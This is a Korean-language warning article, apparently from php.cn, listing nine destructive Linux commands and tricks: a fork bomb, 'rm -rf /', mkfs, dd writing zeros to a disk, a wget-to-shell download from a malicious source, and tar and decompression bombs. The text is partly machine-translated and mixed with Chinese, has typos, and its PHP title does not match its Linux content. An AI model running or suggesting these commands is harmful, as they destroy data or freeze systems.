>  기사  >  백엔드 개발  >  항상 주의해야 하는 9가지 PHP 명령 및 코드

항상 주의해야 하는 9가지 PHP 명령 및 코드

伊谢尔伦
伊谢尔伦원래의
2016-11-24 14:31:481172검색

Linux 셸/터미널 명령은 매우 강력합니다. 간단한 명령으로도 폴더, 파일 또는 경로 폴더가 삭제될 수 있습니다.

어떤 경우에는 Linux가 사용자에게 묻지도 않고 직접 명령을 실행하여 다양한 데이터 정보를 잃어버리는 경우가 있습니다.

일반적으로 새로운 Linux 사용자는 웹에서 이러한 명령을 실행하는 것이 좋습니다. 물론 이 코드를 작성한 사람들도 그렇게 생각하지 않는 경우가 있습니다. 왜냐하면 이것은 더 이상 농담이 아니기 때문입니다. 당신은 그것을 적어 둡니다.

여기에서는 시스템에 유해한 Linux 코드를 방지하는 데 도움이 되는 몇 가지 Linux 코드를 수집했습니다. 기억하세요: 이 코드는 매우 위험하며 수정되어 더욱 해로울 수도 있습니다.

기타 참고 사항: 일부 명령은 Ubuntu에서 sudo 접두사가 있는 경우에만 해롭습니다. 다른 Linux 배포판은 루트 디렉터리 명령으로 사용되면 해로울 수 있습니다.

1. Linux Fork Bomb 명령

:(){ :|: & };: Fork Bomb이라고도 알려진 이 공격은 Linux 시스템에 대한 서비스 거부 공격입니다. :(){ :|: & };:는 bash 함수입니다. 실행되는 한 시스템이 정지될 때까지 반복됩니다.

이 문제는 시스템을 다시 시작해야만 해결할 수 있습니다. 따라서 Linux 인터페이스에서 이 명령을 실행할 때는 주의를 기울여야 합니다.

2. Mv 폴더/Dev/Null 명령

mv 폴더/dev/null도 위험한 명령입니다. Dev/null 또는 null 장치는 이 장치 파일에 기록된 모든 데이터를 삭제하는 장치 파일입니다. 그러나 작업 프롬프트에는 쓰기 작업이 성공적으로 실행되었다는 메시지가 표시됩니다. 이것이 우리가 흔히 비트벅(bit Bucked) 또는 블랙홀이라고 부르는 현상입니다.

3. Rm -Rf 명령

rm -rf 명령은 Linux 시스템에서 폴더와 해당 내용을 빠르게 삭제할 수 있습니다. 올바르게 사용하는 방법을 모르면 그냥 울게 될 것입니다.

m-rf 명령의 가장 일반적인 조합과 선택 사항을 나열하십시오.

rm command :删除Linux系统的文件
rm -f command:不需提示,删除文件中的只读文件
rm -r command 循环删除文件夹的内容
rm -d command :删除空目录,如果非空目录则不会执行该操作
rm -rf/ command:强制删除根目录中的所有内容和子文件夹(包括写保护文件)命令。
rm -rf* command :强制删除当前目录中的所有内容(当前工作目录)和字文件夹
rm -rf. command:强制删除当前文件夹目录/子目录中的所有内容 。同rm -r.[^.]*
The rm -r.[^.]* command :删除文件及文件夹,带有删除提示

4. Mkfs 명령

mkfs의 기능을 모른다면 이는 또한 위험한 명령이기도 합니다. mkfs 이후에 작성된 모든 명령은 형식이 지정되고 빈 Linux 파일 시스템으로 대체됩니다.

하드디스크 포맷을 위해 관리자 권한이 필요한 명령어는 다음과 같습니다.

mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs.minix
mkfs.msdos mkfs.reiserfs
mkfs.vfat

mkfs.cramfs도 위 코드와 동일한 작업을 수행할 수 있지만 관리 소스가 필요하지 않습니다. 진상.

5. Tar Bomb

tar 명령은 여러 파일을 .tar 형식의 하나의 파일(아카이브 파일)로 묶는 데 사용됩니다. 테이프 아카이브(Tar) 폭탄은 그에 의해 생성될 수 있습니다.

압축하면 새 디렉터리가 아닌 현재 디렉터리에 나타나는 유사한 이름의 파일 수만 개를 생성하는 것이 바로 이 아카이브 파일입니다.

tar 파일을 받을 때 정기적으로 새 보호 디렉터리를 만든 다음 압축을 풀기 전에 받은 tar 파일을 이 디렉터리에 넣으면 tar 폭탄의 피해자가 되는 것을 피할 수 있습니다.

6. Dd 명령

Dd 명령은 하드 디스크 파티션을 복사하고 변경하는 데 사용됩니다. 잘못된 장소에 사용하면 위험할 수 있습니다.

dd 명령은 다음과 같습니다.

dd if=/dev/hda of=/dev/hdb
dd if=/dev/hda of=/dev/sdb
dd if=something of=/dev/hda
dd if=something of=/dev/sda

다음 명령은 전체 기본 하드 디스크를 지웁니다. dd if=/dev/zero of=/dev/had

7. 쉘 스크립트 코드

가끔 속아서 쉘 스크립트 파일을 다운로드받아 실행하게 하는 경우도 있습니다. 스크립트에는 악의적이거나 위험한 코드가 포함되어 있을 수 있습니다. 명령 형식은 다음과 같습니다: wget http://some_malicious_source -O- sh. wget은 sh 좁은 스크립트일 때 스크립트를 다운로드합니다.

8. 악성 소스 코드

누군가가 소스 코드를 제공하고 컴파일하도록 할 수도 있습니다. 해당 코드는 정상적인 코드일 수도 있지만, 대용량 소스코드에 위장된 일부 악성코드가 있을 수 있습니다. 이를 방지하는 방법은 신뢰할 수 있는 소스의 소스 코드만 수락하고 컴파일하는 것입니다.

9. 압축 해제 폭탄

압축 파일을 받았는데 KB 정도의 작은 파일을 추출하라는 요청을 받았습니다. 실제로 작은 크기의 압축 파일에는 고도로 압축된 데이터가 포함되어 있습니다.

파일의 압축을 풀면 수백 GB의 데이터가 추출되며, 이때 지나치게 큰 데이터가 하드 디스크를 가득 채워 다운타임이 발생할 가능성이 매우 높습니다. 이를 피하는 방법은 무엇입니까? 오래된 속담처럼, 값싸게 굴지 말고, 어떤 문서든 받아들이고, 신뢰할 수 있는 출처의 문서를 받아들이십시오.


성명:
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.